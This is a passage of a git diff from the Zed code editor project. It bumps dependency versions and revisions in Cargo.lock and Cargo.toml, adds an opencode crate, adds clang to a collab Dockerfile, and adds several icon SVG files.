"pet-core", "pet-fs", "pet-python-utils", "pet-virtualenv", + "regex", ] [[package]] name = "pet-pixi" version = "0.1.0" -source = 
"git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12301,7 +12416,7 @@ dependencies = [ [[package]] name = "pet-poetry" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "base64 0.22.1", "lazy_static", @@ -12322,7 +12437,7 @@ dependencies = [ [[package]] name = "pet-pyenv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12340,7 +12455,7 @@ dependencies = [ [[package]] name = "pet-python-utils" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "lazy_static", @@ -12357,7 +12472,7 @@ dependencies = [ [[package]] name = "pet-reporter" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = 
"git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "log", @@ -12371,7 +12486,7 @@ dependencies = [ [[package]] name = "pet-telemetry" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "lazy_static", @@ -12386,7 +12501,7 @@ dependencies = [ [[package]] name = "pet-uv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "pet-core", @@ -12398,7 +12513,7 @@ dependencies = [ [[package]] name = "pet-venv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12410,7 +12525,7 @@ dependencies = [ [[package]] name = "pet-virtualenv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", 
"msvc_spectre_libs", @@ -12422,7 +12537,7 @@ dependencies = [ [[package]] name = "pet-virtualenvwrapper" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12435,7 +12550,7 @@ dependencies = [ [[package]] name = "pet-windows-registry" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12453,7 +12568,7 @@ dependencies = [ [[package]] name = "pet-windows-store" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12466,6 +12581,20 @@ dependencies = [ "winreg 0.55.0", ] +[[package]] +name = "pet-winpython" +version = "0.1.0" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" +dependencies = [ + "lazy_static", + "log", + "pet-core", + "pet-fs", + "pet-python-utils", + "pet-virtualenv", + "regex", +] + [[package]] name = "petgraph" version = "0.6.5" @@ -13078,10 +13207,11 @@ dependencies = [ "clock", "collections", "context_server", + "credentials_provider", "dap", "encoding_rs", 
"extension", - "fancy-regex", + "fancy-regex 0.17.0", "fs", "futures 0.3.31", "fuzzy", @@ -13174,6 +13304,7 @@ dependencies = [ "criterion", "db", "editor", + "feature_flags", "file_icons", "git", "git_ui", @@ -13185,6 +13316,7 @@ dependencies = [ "pretty_assertions", "project", "rayon", + "remote_connection", "schemars", "search", "serde", @@ -13271,8 +13403,8 @@ name = "proptest" version = "1.10.0" source = "git+https://github.com/proptest-rs/proptest?rev=3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b#3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b" dependencies = [ - "bit-set", - "bit-vec", + "bit-set 0.8.0", + "bit-vec 0.8.0", "bitflags 2.10.0", "num-traits", "proptest-macro", @@ -13901,6 +14033,18 @@ version = "0.6.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "20675572f6f24e9e76ef639bc5552774ed45f1c30e2951e1e99c59888861c539" +[[package]] +name = "raw-window-metal" +version = "1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "40d213455a5f1dc59214213c7330e074ddf8114c9a42411eb890c767357ce135" +dependencies = [ + "objc2", + "objc2-core-foundation", + "objc2-foundation", + "objc2-quartz-core", +] + [[package]] name = "rayon" version = "1.11.0" @@ -14563,10 +14707,10 @@ dependencies = [ name = "rope" version = "0.1.0" dependencies = [ - "arrayvec", "criterion", "ctor", "gpui", + "heapless", "log", "rand 0.9.2", "rayon", @@ -15303,6 +15447,7 @@ dependencies = [ "language", "lsp", "menu", + "multi_buffer", "pretty_assertions", "project", "serde", @@ -15675,6 +15820,7 @@ dependencies = [ "edit_prediction", "edit_prediction_ui", "editor", + "feature_flags", "fs", "futures 0.3.31", "fuzzy", @@ -15814,24 +15960,30 @@ name = "sidebar" version = "0.1.0" dependencies = [ "acp_thread", + "action_log", "agent", "agent-client-protocol", "agent_ui", + "anyhow", "assistant_text_thread", "chrono", "editor", "feature_flags", "fs", + "git", "gpui", "language_model", "menu", + "pretty_assertions", "project", + "prompt_store", 
"recent_projects", "serde_json", "settings", "theme", "ui", "util", + "vim_mode_setting", "workspace", "zed_actions", ] @@ -16126,9 +16278,9 @@ dependencies = [ [[package]] name = "spirv" -version = "0.3.0+sdk-1.3.268.0" +version = "0.4.0+sdk-1.4.341.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eda41003dc44290527a59b13432d4a0379379fa074b70174882adfbdfd917844" +checksum = "d9571ea910ebd84c86af4b3ed27f9dbdc6ad06f17c5f96146b2b671e2976744f" dependencies = [ "bitflags 2.10.0", ] @@ -16573,7 +16725,16 @@ version = "0.27.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "af23d6f6c1a224baef9d3f61e287d2761385a5b88fdab4eb4c6f11aeb54c4bcf" dependencies = [ - "strum_macros", + "strum_macros 0.27.2", +] + +[[package]] +name = "strum" +version = "0.28.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9628de9b8791db39ceda2b119bbe13134770b56c138ec1d3af810d045c04f9bd" +dependencies = [ + "strum_macros 0.28.0", ] [[package]] @@ -16588,6 +16749,18 @@ dependencies = [ "syn 2.0.117", ] +[[package]] +name = "strum_macros" +version = "0.28.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ab85eea0270ee17587ed4156089e10b9e6880ee688791d45a905f5b1ca36f664" +dependencies = [ + "heck 0.5.0", + "proc-macro2", + "quote", + "syn 2.0.117", +] + [[package]] name = "subtle" version = "2.6.1" @@ -16598,8 +16771,8 @@ checksum = "13c2bddecc57b384dee18652358fb23172facb8a2c51ccc10d74c157bdea3292" name = "sum_tree" version = "0.1.0" dependencies = [ - "arrayvec", "ctor", + "heapless", "log", "proptest", "rand 0.9.2", @@ -17517,7 +17690,7 @@ dependencies = [ "anyhow", "base64 0.22.1", "bstr", - "fancy-regex", + "fancy-regex 0.16.2", "lazy_static", "regex", "rustc-hash 1.1.0", @@ -17604,15 +17777,14 @@ dependencies = [ [[package]] name = "tiny_http" -version = "0.8.2" +version = "0.12.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = 
"9ce51b50006056f590c9b7c3808c3bd70f0d1101666629713866c227d6e58d39" +checksum = "389915df6413a2e74fb181895f933386023c71110878cd0825588928e64cdc82" dependencies = [ "ascii", - "chrono", "chunked_transfer", + "httpdate", "log", - "url", ] [[package]] @@ -17662,15 +17834,17 @@ dependencies = [ "client", "cloud_api_types", "db", - "feature_flags", "git_ui", "gpui", + "icons", + "livekit_client", "notifications", "platform_title_bar", "project", "recent_projects", "release_channel", "remote", + "remote_connection", "rpc", "schemars", "semver", @@ -18376,9 +18550,9 @@ dependencies = [ [[package]] name = "tree-sitter-rust" -version = "0.24.0" +version = "0.24.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4b9b18034c684a2420722be8b2a91c9c44f2546b631c039edf575ccba8c61be1" +checksum = "f715f73a0687261ddb686f0d64a1e5af57bd199c4d12be5fdda6676ce1885bf9" dependencies = [ "cc", "tree-sitter-language", @@ -19031,6 +19205,7 @@ dependencies = [ name = "vim_mode_setting" version = "0.1.0" dependencies = [ + "gpui", "settings", ] @@ -19922,7 +20097,7 @@ dependencies = [ [[package]] name = "webrtc-sys" version = "0.3.23" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "cc", "cxx", @@ -19936,7 +20111,7 @@ dependencies = [ [[package]] name = "webrtc-sys-build" version = "0.3.13" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "anyhow", "fs2", @@ -19955,8 +20130,8 @@ checksum = 
"a751b3277700db47d3e574514de2eced5e54dc8a5436a3bf7a0b248b2cee16f3" [[package]] name = "wgpu" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "arrayvec", "bitflags 2.10.0", @@ -19967,7 +20142,7 @@ dependencies = [ "hashbrown 0.16.1", "js-sys", "log", - "naga 28.0.1", + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", "parking_lot", "portable-atomic", "profiling", @@ -19984,12 +20159,12 @@ dependencies = [ [[package]] name = "wgpu-core" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "arrayvec", - "bit-set", - "bit-vec", + "bit-set 0.9.1", + "bit-vec 0.9.1", "bitflags 2.10.0", "bytemuck", "cfg_aliases 0.2.1", @@ -19997,7 +20172,7 @@ dependencies = [ "hashbrown 0.16.1", "indexmap", "log", - "naga 28.0.1", + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", "once_cell", "parking_lot", "portable-atomic", @@ -20010,48 +20185,48 @@ dependencies = [ "wgpu-core-deps-emscripten", "wgpu-core-deps-windows-linux-android", "wgpu-hal", + "wgpu-naga-bridge", "wgpu-types", ] [[package]] name = "wgpu-core-deps-apple" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "wgpu-hal", ] [[package]] name = "wgpu-core-deps-emscripten" -version = "28.0.1" -source = 
"git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "wgpu-hal", ] [[package]] name = "wgpu-core-deps-windows-linux-android" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "wgpu-hal", ] [[package]] name = "wgpu-hal" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "android_system_properties", "arrayvec", "ash", - "bit-set", + "bit-set 0.9.1", "bitflags 2.10.0", - "block", + "block2", "bytemuck", "cfg-if", "cfg_aliases 0.2.1", - "core-graphics-types 0.2.0", "glow", "glutin_wgl_sys", "gpu-allocator", @@ -20062,10 +20237,13 @@ dependencies = [ "libc", "libloading", "log", - "metal", - "naga 28.0.1", + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", "ndk-sys", - "objc", + "objc2", + "objc2-core-foundation", + "objc2-foundation", + "objc2-metal", + "objc2-quartz-core", "once_cell", "ordered-float 4.6.0", "parking_lot", @@ -20074,25 +20252,38 @@ dependencies = [ "profiling", "range-alloc", "raw-window-handle", + "raw-window-metal", "renderdoc-sys", "smallvec", "thiserror 2.0.17", "wasm-bindgen", + "wayland-sys", "web-sys", + "wgpu-naga-bridge", "wgpu-types", "windows 0.62.2", "windows-core 0.62.2", ] +[[package]] +name = "wgpu-naga-bridge" +version = "29.0.0" +source = 
"git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" +dependencies = [ + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", + "wgpu-types", +] + [[package]] name = "wgpu-types" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "bitflags 2.10.0", "bytemuck", "js-sys", "log", + "raw-window-handle", "web-sys", ] @@ -21349,6 +21540,7 @@ dependencies = [ "ui", "util", "uuid", + "vim_mode_setting", "windows 0.61.3", "zed_actions", "zlog", @@ -21765,7 +21957,7 @@ dependencies = [ [[package]] name = "zed" -version = "0.228.0" +version = "0.230.0" dependencies = [ "acp_thread", "acp_tools", @@ -22092,14 +22284,14 @@ dependencies = [ [[package]] name = "zed_glsl" -version = "0.2.0" +version = "0.2.2" dependencies = [ "zed_extension_api 0.1.0", ] [[package]] name = "zed_html" -version = "0.3.0" +version = "0.3.1" dependencies = [ "zed_extension_api 0.7.0", ] diff --git a/Cargo.toml b/Cargo.toml index b6760fa917da7e051fd60a1375be49d516fcf113..f14be5eb54f459054c1d411a08d0318189dfdf42 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -134,6 +134,7 @@ members = [ "crates/notifications", "crates/ollama", "crates/onboarding", + "crates/opencode", "crates/open_ai", "crates/open_path_prompt", "crates/open_router", @@ -381,6 +382,7 @@ node_runtime = { path = "crates/node_runtime" } notifications = { path = "crates/notifications" } ollama = { path = "crates/ollama" } onboarding = { path = "crates/onboarding" } +opencode = { path = "crates/opencode" } open_ai = { path = "crates/open_ai" } open_path_prompt = { path = "crates/open_path_prompt" } open_router = { path = "crates/open_router", features = ["schemars"] } @@ -475,12 +477,11 @@ ztracing_macro = { path = 
"crates/ztracing_macro" } # External crates # -agent-client-protocol = { version = "=0.9.4", features = ["unstable"] } +agent-client-protocol = { version = "=0.10.2", features = ["unstable"] } aho-corasick = "1.1" alacritty_terminal = { git = "https://github.com/zed-industries/alacritty", rev = "9d9640d4" } any_vec = "0.14" anyhow = "1.0.86" -arrayvec = { version = "0.7.4", features = ["serde"] } ashpd = { version = "0.13", default-features = false, features = [ "async-io", "notification", @@ -513,7 +514,6 @@ aws-smithy-runtime-api = { version = "1.9.2", features = ["http-1x", "client"] } aws-smithy-types = { version = "1.3.4", features = ["http-body-1-x"] } backtrace = "0.3" base64 = "0.22" -bincode = "1.2.1" bitflags = "2.6.0" brotli = "8.0.2" bytes = "1.0" @@ -551,19 +551,21 @@ derive_more = { version = "2.1.1", features = [ dirs = "4.0" documented = "0.9.1" dotenvy = "0.15.0" +dunce = "1.0" ec4rs = "1.1" emojis = "0.6.1" env_logger = "0.11" encoding_rs = "0.8" exec = "0.3.1" -fancy-regex = "0.16.0" +fancy-regex = "0.17.0" fork = "0.4.0" futures = "0.3" futures-concurrency = "7.7.1" futures-lite = "1.13" -gh-workflow = { git = "https://github.com/zed-industries/gh-workflow", rev = "c9eac0ed361583e1072860d96776fa52775b82ac" } +gh-workflow = { git = "https://github.com/zed-industries/gh-workflow", rev = "37f3c0575d379c218a9c455ee67585184e40d43f" } git2 = { version = "0.20.1", default-features = false, features = ["vendored-libgit2"] } globset = "0.4" +heapless = "0.9.2" handlebars = "4.3" heck = "0.5" heed = { version = "0.21.0", features = ["read-txn-no-tls"] } @@ -572,7 +574,6 @@ human_bytes = "0.4.1" html5ever = "0.27.0" http = "1.1" http-body = "1.0" -hyper = "0.14" ignore = "0.4.22" image = "0.25.1" imara-diff = "0.1.8" @@ -597,13 +598,13 @@ markup5ever_rcdom = "0.3.0" metal = "0.33" minidumper = "0.9" moka = { version = "0.12.10", features = ["sync"] } -naga = { version = "28.0", features = ["wgsl-in"] } +naga = { version = "29.0", features = ["wgsl-in"] } 
nanoid = "0.4" nbformat = "1.2.0" nix = "0.29" num-format = "0.4.4" objc = "0.2" -objc2-foundation = { version = "=0.3.1", default-features = false, features = [ +objc2-foundation = { version = "=0.3.2", default-features = false, features = [ "NSArray", "NSAttributedString", "NSBundle", @@ -637,13 +638,13 @@ parse_int = "0.9" pciid-parser = "0.8.0" pathdiff = "0.2" percent-encoding = "2.3.2" -pet = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-conda = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-core = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-fs = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-poetry = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-reporter = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-virtualenv = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } +pet = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-conda = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-core = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-fs = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-poetry = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-reporter = { 
git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-virtualenv = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } portable-pty = "0.9.0" postage = { version = "0.5", features = ["futures-traits"] } pretty_assertions = { version = "1.3.0", features = ["unstable"] } @@ -690,7 +691,6 @@ serde_json_lenient = { version = "0.2", features = [ "raw_value", ] } serde_path_to_error = "0.1.17" -serde_repr = "0.1" serde_urlencoded = "0.7" sha2 = "0.10" shellexpand = "2.1.0" @@ -719,9 +719,8 @@ time = { version = "0.3", features = [ "formatting", "local-offset", ] } -tiny_http = "0.8" +tiny_http = "0.12" tokio = { version = "1" } -tokio-tungstenite = { version = "0.26", features = ["__rustls-tls"] } tokio-socks = { version = "0.5.2", default-features = false, features = [ "futures-io", "tokio", @@ -753,7 +752,7 @@ tree-sitter-md = { git = "https://github.com/tree-sitter-grammars/tree-sitter-ma tree-sitter-python = "0.25" tree-sitter-regex = "0.24" tree-sitter-ruby = "0.23" -tree-sitter-rust = "0.24" +tree-sitter-rust = "0.24.1" tree-sitter-typescript = { git = "https://github.com/zed-industries/tree-sitter-typescript", rev = "e2c53597d6a5d9cf7bbe8dccde576fe1e46c5899" } # https://github.com/tree-sitter/tree-sitter-typescript/pull/347 tree-sitter-yaml = { git = "https://github.com/zed-industries/tree-sitter-yaml", rev = "baff0b51c64ef6a1fb1f8390f3ad6015b83ec13a" } tracing = "0.1.40" @@ -782,7 +781,8 @@ wax = "0.7" which = "6.0.0" wasm-bindgen = "0.2.113" web-time = "1.1.0" -wgpu = { git = "https://github.com/zed-industries/wgpu", rev = "465557eccfe77c840a9b4936f1408da9503372c4" } +webrtc-sys = "0.3.23" +wgpu = { git = "https://github.com/zed-industries/wgpu.git", branch = "v29" } windows-core = "0.61" yawc = "0.2.5" zeroize = "1.8" @@ -850,8 +850,9 @@ notify = { git = "https://github.com/zed-industries/notify.git", rev = "ce58c24c 
notify-types = { git = "https://github.com/zed-industries/notify.git", rev = "ce58c24cad542c28e04ced02e20325a4ec28a31d" } windows-capture = { git = "https://github.com/zed-industries/windows-capture.git", rev = "f0d6c1b6691db75461b732f6d5ff56eed002eeb9" } calloop = { git = "https://github.com/zed-industries/calloop" } -livekit = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "37835f840d0070d45ac8b31cce6a6ae7aca3f459" } -libwebrtc = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "37835f840d0070d45ac8b31cce6a6ae7aca3f459" } +livekit = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "c1209aa155cbf4543383774f884a46ae7e53ee2e" } +libwebrtc = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "c1209aa155cbf4543383774f884a46ae7e53ee2e" } +webrtc-sys = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "c1209aa155cbf4543383774f884a46ae7e53ee2e" } [profile.dev] split-debuginfo = "unpacked" diff --git a/Dockerfile-collab b/Dockerfile-collab index 63359334906b58c560c0ed6acc6378259ccbd5c5..50af874200a6ef3bc3c882b7d08257ec41f944de 100644 --- a/Dockerfile-collab +++ b/Dockerfile-collab @@ -14,8 +14,12 @@ ARG GITHUB_SHA ENV GITHUB_SHA=$GITHUB_SHA # Also add `cmake`, since we need it to build `wasmtime`. +# clang is needed because `webrtc-sys` uses Clang-specific compiler flags. 
RUN apt-get update; \ - apt-get install -y --no-install-recommends cmake + apt-get install -y --no-install-recommends cmake clang + +ENV CC=clang +ENV CXX=clang++ RUN --mount=type=cache,target=./script/node_modules \ --mount=type=cache,target=/usr/local/cargo/registry \ diff --git a/REVIEWERS.conl b/REVIEWERS.conl index 82086b7f42cbb123487030cf7d2e64fc1288cbd2..85cdb3ee89c10b1bfb567a0007a603cc01f922c7 100644 --- a/REVIEWERS.conl +++ b/REVIEWERS.conl @@ -122,6 +122,5 @@ vim = @probably-neb windows - = @localcc = @reflectronic = @Veykril diff --git a/assets/icons/ai_open_code.svg b/assets/icons/ai_open_code.svg new file mode 100644 index 0000000000000000000000000000000000000000..304b155188c2286a4f8cab208872d0373d8099f1 --- /dev/null +++ b/assets/icons/ai_open_code.svg @@ -0,0 +1,3 @@ + + + diff --git a/assets/icons/archive.svg b/assets/icons/archive.svg new file mode 100644 index 0000000000000000000000000000000000000000..9ffe3f39d27c7fe5cbb532a4f263c8800398e96f --- /dev/null +++ b/assets/icons/archive.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/eye_off.svg b/assets/icons/eye_off.svg new file mode 100644 index 0000000000000000000000000000000000000000..3057c3050c36c72be314f9b0646d44932c52e4ee --- /dev/null +++ b/assets/icons/eye_off.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/focus.svg b/assets/icons/focus.svg new file mode 100644 index 0000000000000000000000000000000000000000..9003e437cee1afa43e87fa273c9510284bb5ae0b --- /dev/null +++ b/assets/icons/focus.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/folder_plus.svg b/assets/icons/folder_plus.svg new file mode 100644 index 0000000000000000000000000000000000000000..a543448ed6197043291369bee640e23b6ad729b9 --- /dev/null +++ b/assets/icons/folder_plus.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/git_merge_conflict.svg b/assets/icons/git_merge_conflict.svg new file mode 100644 index 0000000000000000000000000000000000000000..10bc2c04fc9877112723273b0d60351c3a4c56bc --- 
/dev/null +++ b/assets/icons/git_merge_conflict.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/git_worktree.svg b/assets/icons/git_worktree.svg new file mode 100644 index 0000000000000000000000000000000000000000..25b49bc69f34d8a742451709d4d4a164f29248b6 --- /dev/null +++ b/assets/icons/git_worktree.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/signal_high.svg b/assets/icons/signal_high.svg new file mode 100644 index 0000000000000000000000000000000000000000..6c1fec96098242444407fb9f66a025d03a10e50b --- /dev/null +++ b/assets/icons/signal_high.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/signal_low.svg b/assets/icons/signal_low.svg new file mode 100644 index 0000000000000000000000000000000000000000..b0ebccdd4c8897e8fdaf013a56cc4498dc5e0fe7 --- /dev/null +++ b/assets/icons/signal_low.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/signal_medium.svg b/assets/icons/signal_medium.svg new file mode 100644 index 0000000000000000000000000000000000000000..3652724dc8b095dd68eb9977108711e71ffe67cb --- /dev/null +++ b/assets/icons/signal_medium.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/stop.svg b/assets/icons/stop.svg index cc2bbe9207acf5acd44ff13e93140099d222250b..5ca9cd29edf17981500482b81e47aa53a16e2713 100644 --- a/assets/icons/stop.svg +++ 